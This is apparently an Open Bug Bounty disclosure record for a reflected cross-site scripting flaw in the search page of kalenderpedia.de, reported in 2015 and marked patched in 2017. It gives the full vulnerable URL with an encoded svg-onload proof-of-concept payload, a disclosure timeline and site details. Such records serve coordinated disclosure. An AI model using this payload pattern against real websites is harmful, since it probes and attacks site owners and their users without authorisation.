kalenderpedia.de XSS vulnerability

2015-11-03T22:53:00
ID OBB:100527
Type openbugbounty
Reporter P4r4Bellum
Modified 2017-11-14T11:38:00

Description

Vulnerable URL:
http://www.kalenderpedia.de/suchergebnisse.html?cx=partner-pub-6119214979619050%3A2571572907&cof;=FORID%3A10&ie;=ISO-8859-1&q;=%3Csvg/onload=alert%28/XSSPOSED/%29%3E&sa;=Suche
Details:

Description| Value
---|---
Patched:| Yes, at 13.11.2017
Latest check for patch:| 13.11.2017 19:16 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 54695
Google Pagerank| 4
VIP website status:| No
Check kalenderpedia.de SSL connection:| (Grade: C+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 3 November, 2015 22:53 GMT
Vulnerability existence verified and confirmed| 3 November, 2015 22:56 GMT
Vulnerability patched by the website owner| 14 November, 2017 11:38 GMT